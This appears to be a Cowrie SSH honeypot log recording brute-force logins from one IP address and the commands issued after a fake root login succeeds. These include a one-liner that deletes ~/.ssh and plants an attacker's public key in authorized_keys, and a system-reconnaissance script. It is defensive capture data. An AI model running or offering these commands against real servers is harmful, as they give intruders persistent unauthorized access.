{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:59:33.833430Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:59:34.123849Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:34.124671Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39172,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd88d832c3b4","protocol":"ssh","message":"New connection: 212.227.235.229:39172 (1.2.3.4:22) [session: fd88d832c3b4]","sensor":"my-vps","timestamp":"2025-08-31T04:59:34.415106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:59:34.415930Z","src_ip":"212.227.235.229","session":"fd88d832c3b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:59:34.707387Z","src_ip":"212.227.235.229","session":"fd88d832c3b4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:34.780901Z","src_ip":"212.227.235.229","session":"1ddf30340a50"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:36.085043Z","src_ip":"212.227.235.229","session":"1ddf30340a50"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:36.128223Z","src_ip":"212.227.235.229","session":"fd88d832c3b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47154,"dst_ip":"1.2.3.4","dst_port":22,"session":"60922c46f093","protocol":"ssh","message":"New connection: 212.227.235.229:47154 (1.2.3.4:22) [session: 60922c46f093]","sensor":"my-vps","timestamp":"2025-08-31T04:59:36.375253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:59:36.376163Z","src_ip":"212.227.235.229","session":"60922c46f093"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:59:36.675017Z","src_ip":"212.227.235.229","session":"60922c46f093"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:37.421562Z","src_ip":"212.227.235.229","session":"fd88d832c3b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39188,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a4a55565382","protocol":"ssh","message":"New connection: 212.227.235.229:39188 (1.2.3.4:22) [session: 9a4a55565382]","sensor":"my-vps","timestamp":"2025-08-31T04:59:37.713418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:59:37.714114Z","src_ip":"212.227.235.229","session":"9a4a55565382"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:37.913445Z","src_ip":"212.227.235.229","session":"60922c46f093"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:59:38.114428Z","src_ip":"212.227.235.229","session":"9a4a55565382"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:38.214308Z","src_ip":"212.227.235.229","session":"60922c46f093"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:38.218216Z","src_ip":"212.227.235.229","session":"e62f0bf7c744"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:39.718952Z","src_ip":"212.227.235.229","session":"9a4a55565382"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:40.008735Z","src_ip":"212.227.235.229","session":"704debfa9cab"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:40.011246Z","src_ip":"212.227.235.229","session":"9a4a55565382"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60322,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c9273a923f8","protocol":"ssh","message":"New connection: 212.227.235.229:60322 (1.2.3.4:22) [session: 8c9273a923f8]","sensor":"my-vps","timestamp":"2025-08-31T04:59:40.507367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:59:41.330171Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:59:41.330882Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46284,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9e43bcf4bbb","protocol":"ssh","message":"New connection: 212.227.235.229:46284 (1.2.3.4:22) [session: a9e43bcf4bbb]","sensor":"my-vps","timestamp":"2025-08-31T04:59:42.872602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:59:43.185756Z","src_ip":"212.227.235.229","session":"a9e43bcf4bbb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:59:43.333757Z","src_ip":"212.227.235.229","session":"a9e43bcf4bbb"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"password1","message":"login attempt [ubnt/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:44.670907Z","src_ip":"212.227.235.229","session":"a9e43bcf4bbb"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:46.790170Z","src_ip":"212.227.235.229","session":"a9e43bcf4bbb"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:46.832933Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:59:48.689312Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.690006Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.690703Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.691684Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.692754Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.693488Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.694308Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.695809Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.696304Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.696950Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.697464Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.698093Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:59:48.698487Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:59:49.692022Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:49.692964Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:49.693853Z","src_ip":"212.227.235.229","session":"8c9273a923f8"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:50.013606Z","src_ip":"212.227.125.160","session":"772c8586afee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44682,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaff2f91f01e","protocol":"ssh","message":"New connection: 212.227.235.229:44682 (1.2.3.4:22) [session: aaff2f91f01e]","sensor":"my-vps","timestamp":"2025-08-31T04:59:50.419315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:59:50.425793Z","src_ip":"212.227.235.229","session":"aaff2f91f01e"}
